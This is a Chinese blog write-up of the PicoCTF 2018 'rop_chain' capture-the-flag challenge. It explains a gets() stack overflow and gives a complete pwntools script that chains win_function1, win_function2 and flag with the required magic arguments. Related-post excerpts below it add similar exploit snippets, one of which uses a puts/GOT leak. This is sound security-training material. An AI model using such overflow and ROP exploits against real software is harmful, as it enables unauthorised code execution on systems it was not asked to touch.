PicoCTF_2018_rop_chain解题

于 2024-07-25 12:18:23 发布
阅读量149 收藏 3
点赞数 11
文章标签: 开发语言 linux 运维 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81504456/article/details/140685970
版权

1.主要看vuln函数,有gets(),可利用栈溢出,也有flag函数,但是有条件,如果打不开flag文件的话则stream返回空值,打开失败那么!stream为真,输出错误语句,而下面的fgets函数则给flag保存了一个副本,满足所框条件则同样可以输出flag。

fgets(arg1[存储读取数据的位置],arg2[读取的前多少位],arg3[被读取数据的位置])

2.对于ida中赋予变量的值,构造rop时需要传入转变为十六进制的数据,鼠标右键转化。

3.保证win1,win2都大于0且a1=0xDEADBAAD的情况下打印出flag,win1函数直接赋值给win1的值是1,win2中传递了参数a1,在这个函数中传给0xBAAAAAAD,则保证了win2是1。

4.上面的flag函数中也是只定义了一个参数a1为另一个值,在构造payload时就要注意分开,a1分别是两个函数的局部变量,要满足各自if的条件,win1中没有定义变量,就不用传递参数。(注意32程序payload的构造方法)

wp如下:

from pwn import*
io = remote('nodeX.buuoj.cn',XXXXX)
elf = ELF('./PicoCTF_2018_rop_chain')
#先整理好所需地址和参数值
flag_addr = 0x0804862B
win1_addr = elf.sym['win_function1']
win2_addr = elf.sym['win_function2']
win2_a1 = 0xBAAAAAAD
flag_a1 = 0xDEADBAAD

io.recvuntil("Enter your input> ")
#构造payload
payload = b'a'*(0x18 + 0x4) + p32(win1_addr)
payload += p32(win2_addr) + p32(flag_addr)
payload += p32(win2_a1) + p32(flag_a1)

io.sendline(payload)
io.interactive()

承诺之时
关注
  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUOJ PWN picoctf_2018_rop chain
weixin_50287973的博客
11-07 178
EXP1 from pwn import* from LibcSearcher import LibcSearcher #p=process("./PicoCTF_2018_rop_chain") p=remote("node3.buuoj.cn",25091) elf=ELF('./PicoCTF_2018_rop_chain') start=0x080484D0 payload=(0x18+4)*'a'+p32(elf.plt['puts'])+p32(start)+p32(elf.got['put
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1184
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
PicoCTF_2018_rop_chain
m0sway的博客
11-24 637
PicoCTF_2018_rop_chain 使用checksec查看: 只开启了栈不可执行,放入IDA中查看: 主函数中直接给出了漏洞函数,跟进查看: 很明显gets()函数存在一个栈溢出,距离ebp0x18 查看发现存在flag.txt字符串,跟进可以发现函数falg,: 将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 找到win1赋值的函数: 发现win1已经被赋值1,可以不用管, 接着看wi
picoctf_2018_rop chain
、moddemod
07-06 649
exp from pwn import * context.log_level = 'debug' proc_name = './PicoCTF_2018_rop_chain' p = remote('node3.buuoj.cn', 27027) elf = ELF(proc_name) flag_addr = elf.sym['flag'] win_function1 = elf.sym['win_function1'] win_function2 = elf.sym['win_function2'
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
Rops.rar_The Conversion_rops
09-22
Note that this rop-form instruction has no dex-form equivilent and must be removed before the dex conversion.
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
"stm8l001j3.pdf"和"stm8s001j3_2018.pdf"以及"STM8S001J3.pdf"虽然主要针对的是STM8L001J3和STM8S001J3型号,但可能包含了一些通用的信息和概念,例如闪存操作和安全特性,对于理解STM8S103的ROP问题也有参考价值。...
精选_使用BitBlt函数实现绘制透明位图_源码打包
03-09
2. 设置颜色键:如果要使用颜色键透明,可以使用`SetBkColor()`函数设置源DC的背景色为透明色,然后在调用BitBlt时使用`SRCCOPY`与`ROP2`常量,这样源DC中所有匹配背景色的像素都不会被复制。 3. 使用BitBlt进行...
exrop:自动ROPChain生成
04-23
Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将...
picoctf_2018_rop_chain
z1r0的博客
12-09 252
picoctf_2018_rop_chain 查看保护 有溢出。 发现了一个flag函数,只需要满足win1不为0和win2不为0和a1=0xdeadbaad即可get flag。 又发现了两个函数,分析一下即可知道是设置win1和win2值的函数 rop的话先放win1这个函数,接着放win2这个函数,win2有参数,满足a1=0xbaaaaad就行。 最后win1和win2都不为0之后flag这个函数有一个a1参数,让a1参数过一下if就行。 构造rop的话注意一下32位的调用:调用函数地址-
【BUUCTFPWN】picoctf_2018_rop chain
m0_55368674的博客
01-19 187
ret2text
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3302
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 983
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
picoctf_2018_rop chain wp(python3)
最新发布
Kata_Jhin的博客
06-02 261
picoctf_2018_rop chain wp(python3)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值